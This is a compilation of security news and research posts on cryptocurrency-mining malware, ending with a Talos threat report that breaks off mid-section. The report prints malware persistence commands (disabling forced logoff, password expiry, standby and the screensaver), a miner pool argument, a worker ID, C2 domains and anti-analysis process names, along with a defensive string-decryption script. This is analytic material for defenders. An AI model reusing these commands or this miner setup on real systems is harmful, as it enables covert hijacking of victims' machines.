In April last year, the ‘EternalBlue’ exploit, formerly owned by the US National Security Agency (NSA), was leaked to the public by hacking group Shadow Brokers. This exploit was then used as a base in the WannaCry virus that infected more than 230,000 computers running the Microsoft Windows operating system in 150 countries in May 2017.

Now, researchers at CrowdStrike, a cybersecurity company, have discovered a new strain of malware that uses the ‘EternalBlue’ exploit, to hijack victims’ computers and CPU processing power to secretly mine cryptocurrency in a new attack dubbed WannaMine.

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors,” the researchers said in a blog post published on January 25.

“WannaMine employs ‘living off the land’ techniques such as Windows Management Instrumentation (WMI) permanent event subscriptions as a persistence mechanism. It also propagates via the EternalBlue exploit popularized by WannaCry.”

This WannaMine malware is quite similar to the one detected by Panda Security in October last year, which was also based on EternalBlue exploit and used by the infected computer to undermine Monero, in that case.

According to the new report, WannaMine can infect a computer in several ways, such as clicking a malicious link in an email or website, or through remote access attack on the victim. In most cases, the victim will not notice anything, except that the computer runs slower.

This malware is complex to attack for companies, as it does not need to download any type of file to infect the computer. Since WannaMine is a fileless operation and uses legitimate system software system software such as WMI and PowerShell to run, it makes it nearly impossible for organizations to detect and block it without some form of next-generation antivirus. However, WannaMine doesn’t immediately look to force the EternalBlue exploit.

It first uses a tool called “MimiKatz” to recover logins and passwords from system memory and try to infiltrate the system once. If that fails, WannaMine turns to the EternalBlue exploit to complete the task and break in.

Once the attack is successful, WannaMine quietly uses the CPU processing power to generate Monero coins in the background. “The WannaMine worm uses advanced techniques to maintain persistence within an infected network and move laterally from system to system,” the researchers said. “In one case, a client informed CrowdStrike that nearly 100% of its environment was rendered unusable due to overutilisation of systems’ CPUs.”

According to CrowdStrike specialists, the number of attacks has increased sharply since the beginning of 2018, and one can expect to see much more cryptomining activity in the coming months, resulting in business disruptions and downtime.

The post WannaMine: Cryptocurrency Mining Malware That Uses An NSA Exploit appeared first on TechWorm.

Ransomware’s difficult second album

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically —to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:

Ransomware drop

Click to enlarge

Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing TOR onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.

FAQ

Click to enlarge

Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

Get in the bin

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and increased public visibility after some huge outbreaks 2017, advances in security tools have become better equipped to deal with ransomware threats. In addition, lots of standalone programs have been made by independent researchers to decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools) alongside decreasing prices for file storage has really helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.

mining

Click to enlarge

The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website, as opposed build the ransomware, pay some developers, mess around with onion sites, write up long FAQs for the victims, maintain C&C servers, ensure the decryption of hijacked files actually works, and so on. And cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on Youtube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a bit of a fast moving plague, and throws the old arguments over blocking ads while hurting publishers to the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.

fake fonts

Click to enlarge

Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in bit of a self-imposed time out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.

India bans cryptocurrencies, but will further explore blockchain

The Indian government doesn’t recognize bitcoin as legal tender and is fully committed to eliminating cryptocurrency payments from its system, Bloomberg writes. Government officials have repeatedly called cryptocurrency payments mere ‘Ponzi schemes’ and sent out thousands of tax notices to cryptocurrency investors.

Despite banning the purchase and sale of cryptocurrency, the Indian government wants to further explore blockchain technology (on which bitcoin is based).

“The government does not consider cryptocurrencies legal tender or coin and will take all measures to eliminate use of these crypto-assets in financing illegitimate activities or as part of the payment system,” Finance Minister Arun Jaitley told lawmakers in New Delhi on Thursday. “The government will explore use of blockchain technology proactively for ushering in digital economy.”

India is not the only country taking measures affecting cryptocurrencies; South Korea and China also announced recently they would regulate cryptocurrencies.

Generally, countries have different policies regarding cryptocurrencies and are looking into either banning them or legalizing cryptocurrency payments by enforcing the same taxes and reporting obligations as for traditional currency.

Social media giant Facebook announced this week that it will ban ads promoting “financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings and cryptocurrency.”

Following Jaitley’s announcement that India will ban cryptocurrencies, bitcoin, ripple and ethereum prices dropped dramatically.

Massive Smominru Cryptocurrency Botnet Rakes In Millions

Researchers say Smominru threat actors are in control of 500,000 node botnet and earning $8,500 daily mining for Monero cryptocurrency.

The State of Security: Facebook’s New Policy Bans All Ads Promoting Cryptocurrencies

Facebook announced on Tuesday its plans to ban all ads that promote Bitcoin and other digital currency exchanges, initial coin offerings (ICOs) and binary options. The social network said the new policy aims to protect users from scams, describing such financial services as “frequently associated with misleading or deceptive promotional practices.” In a company blog […]… Read More

The post Facebook’s New Policy Bans All Ads Promoting Cryptocurrencies appeared first on The State of Security.



The State of Security

Facebook’s New Policy Bans All Ads Promoting Cryptocurrencies

Facebook announced on Tuesday its plans to ban all ads that promote Bitcoin and other digital currency exchanges, initial coin offerings (ICOs) and binary options. The social network said the new policy aims to protect users from scams, describing such financial services as “frequently associated with misleading or deceptive promotional practices.” In a company blog […]… Read More

The post Facebook’s New Policy Bans All Ads Promoting Cryptocurrencies appeared first on The State of Security.

Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions

The Dark Side of the Digital Gold Rush


This post was authored by Nick Biasini, Edmund Brumaghin, Warren Mercer and Josh Reynolds with contributions from Azim Khodijbaev and David Liebenberg.


Executive Summary


The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks.

This focus on mining isn't entirely surprising, considering that various cryptocurrencies along with "blockchain" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims.

In this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward.

To put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing.

This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially:
  • The value of many cryptocurrencies are skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.
  • These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims and the mining software isn't technically malware -- So theoretically, the victims could remain part of the adversary's botnet for as long as the attacker chooses.
  • Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers – sitting on this currency until it hits such a point where the attacker decides to cash in.

Introduction


Throughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns.

Over the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and "blockchain" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention.

What is 'Mining'?


At a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine.

Bitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors.

There are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic.

How does pool based mining work?


Pool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensures the coin mined by the pool that is associated with a particular Worker ID are delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following:
  1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.
  2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.
These miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below: (note that there are variations in the parameter names used based on the specific mining software being used.)
Example Command Line Syntax

As you can see there are two primary argument values required: The URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool which is used to manage how payouts are conducted. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems as no computing resource limits are enforced. These options include:
  • Limits on CPU Usage.
  • Limits on System Temperature.
  • Amount of cores being used.
  • Sleep periods.
Each mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use).

Origins on the Underground


Talos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time.

From a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied with a learning curve associated with mining, including a better understanding around how much coin can be mined and the opportune times to conduct the mining activity. As far as the malware that can be used to conduct mining, most of them are written in C# or C++ and as is common on these forums they are advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis.

In general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them.

Malicious Mining


Malicious mining is the focus of this post since its an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities and malicious mining is quickly becoming a cash cow for the bad guys.

Over the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit research where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system.

Adversaries are left with an interesting decision, continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink or begin leveraging other payloads. There are no shortage of options available to bad guys including banking trojans, bots, credential stealers, and click-fraud malware to name a few.

So why choose crypto mining software?

There are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands off infection to manage. Once a system has a miner dropped on it and starts mining nothing else is needed from an adversary perspective. There isn't any command and control activity and it generates revenue consistently until its removed. So if an adversary notices a drop off in nodes mining to their pool it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding under the users purview for as long as possible. The longer the user doesn't notice the miner running the larger potential payout for the activity.

The biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin.

Let's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly.

Some of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue.

In one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero.
Worker ID Statistics

In a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software.
Historical Hash Rate

In analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s.
Current Hash Rate

Using an online calculator that takes hash rate, power consumption and cost then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers.

Analyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884.
Worker ID Payment History

While analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach.
High Volume Calculations

One additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year from $13 in January 2017 to over $300 at the time of this article and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting on to systems in the first place.

Threats Delivering Miners


Cryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation.

Email Based


There are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically have an archive containing a Word document that downloads the miner via a malicious macro or unpacks a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the binary that is included is a widely distributed Monero miner which is executed with the miscreants worker ID and pool, allowing attackers to reap the mining benefits.

Below is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate.
Example Malicious Email

As you can see the email contains a word document which, when opened, looks like the following.
Example Word Document

As is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used.

This image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function:
Highly Obfuscated VBA Macros Using Document_Open()

The macro leads to a call to a Shell command:
Highly Obfuscated VBA Macro VBA.Shell Call

We can see what is executed by this command after it is de-obfuscated by setting the first parameter into a MsgBox call:
MsgBox for Shell Replacement

This will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. This can also be seen through the dynamic activity in Threat Grid:
Office Document Launches a Powershell Indicator in Threat Grid

We also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension:
Portable Executable Image Extension Identification Threat Grid

In this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid:
xmrig Execution in Threat Grid

Dynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory:
Dynamic Miner Execution in AMP for Endpoint's Device Trajectory

Mining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments:
Mining Traffic Classification using Cognitive Threat Analytics

Dark Test Cryptomining Malware


Dark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail.

Dark Test Obfuscation


Dark Test makes use of a packer which, after unpacking, creates a suspended version of itself using CreateProcessA and overwrites itself in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping from the address of lpBuffer buffer up to nSize.

Dark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations resulting in the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer:
Dynamic Method Resolution Using metadataToken Integer

Functions are also indirectly called using the calli function which is passed a pointer to an entry point of a function and its accompanying parameters:
Runtime Resolved Function Calls using calli

The decryption function takes three integer parameters. The first two make up the seek offset for the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset:
Dark Test String Decryption Function

At the calculated offset, the first four bytes is the offset of the ciphertext, and the next four is length of the string being decrypted. It then iterates for this length within an XOR for loop to decrypt the string at this offset. These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects:
Dark Test String Decryption Function Call

The result, in this case, being the string "-o pool.minexmr.com:4444 -u" which is the domain and port combination for the mining pool the miner is participating in and the username parameter without a value. Although these strings are decrypted at runtime they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use):
Dynamic Miner Activity Command Line Arguments

Runtime resolved objects and functions make it difficult to extract all strings as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal): [106, 242, 28] for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime calculated offsets. Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges:
#!/usr/bin/ruby

fr = File.read(ARGV[0])
fb = fr.bytes

for i in 0..fb.length-4
#Through their obfuscation technique we get an egg for obfuscated string lengths and offsets to find in the resource
if fb[i] == 106 && fb[i+1] == 242 && fb[i+2] == 28
#Perform their arithmetic with provided bytes into an 32-bit int
length = [fb[i-1], 106, 242, 28].pack("V*").split("\x00").join.unpack("V")[0] - 5 ^ 485648943
seek_offset_bytes = [fb[i-5], fb[i-4], fb[i-3], fb[i-2]]
seek_offset = (seek_offset_bytes.pack("V*").split("\x00").join.unpack("V")[0] ^ 2100157544) - 100
puts "Found length of: #{length}"
puts "Seek offset bytes: #{seek_offset_bytes.inspect}"
ciphertext = []
for j in 0..length-1
ciphertext << fb[seek_offset+j]
end
if length > 2
for x in 0x00..0xFF
finished = true
result = []
for c in ciphertext
unless((x ^ c).between?(0x20,0x7E))
finished = false
break
end
result << (x ^ c)
end
if finished
puts "Found possible XOR key for string: #{result.pack("I*").split("\x00").join} of length: #{length}"
end
end
end
end
end

This brute force approach provides some invalid results, however, also provides clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining:
/C net accounts /forcelogoff:no
This prevents forced logoffs from remote administrators.
/C net accounts /maxpwage:unlimited
This sets the maximum password age to unlimited, which in turn prevents password expiry.
/C powercfg /x /standby-timeout-ac 0
This will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle.
/C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f of length: 99
This will prevent the screensaver from starting.

Further, observed strings are those for anti-analysis:
procexp
PROCEXP
pROCESShACKER
ProcessHacker
procexp64
Detect detector!
Clear!
taskmgr

Dark Test Network traffic


Two GET requests are sent to the api.ipfy.org used for public IP address identification. This is then followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations of two executable files: bz.exe and cpu.zip
Dynamic Miner Activity Command Line Arguments

Oddly enough this is not a valid .onion address, and is likely a placeholder from the server for this dropper, or a kiddie who set this up without replacing what the gateway was returning to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands for setting up a database with these domains with Russian comments:
Pastebin SQL Commands

This further implies the possibility of a builder or distributed gateway being used. Further searches turned up a number of in-the-wild filenames which correspond to wares:
Dark Test VirusTotal Observed in-the-wild Filenames

This could indicate warez as being a possible distribution vector for this malware.

Dark Test Version 2


Throughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to shared attributes with the first version of Dark Test we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes the main thread. A notable difference is a more extensive list of anti-analysis strings which are searched for using Process32FirstW:
Anti-Analysis Strings

An interesting addition being vnc.exe to possibly detect VPS or analysis systems connected to using VNC.

Exploit Kit Based


In addition to the spam campaigns above Talos has also been observing RIG exploit kit delivering miners via smokeloader over the last couple months. The actual infection via the exploit kit is pretty standard for RIG activity. However, the great thing about mining is there are easily trackable elements left on the system, namely the 'Worker ID', as shown below:
Command Line Syntax

Using the Worker ID of:
43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD
we began digging into the amount of hashes this system is mining. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/Day.

That may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years without being impacted without additional maintenance required by the actor. The only operational costs are associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually.

However, when we started looking further back, this campaign has been ongoing off and on over the last six months with peak hash rates in excess of 100 KH/sec.
Historical Hash Rate

The campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It's currently still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader.

Active Exploitation


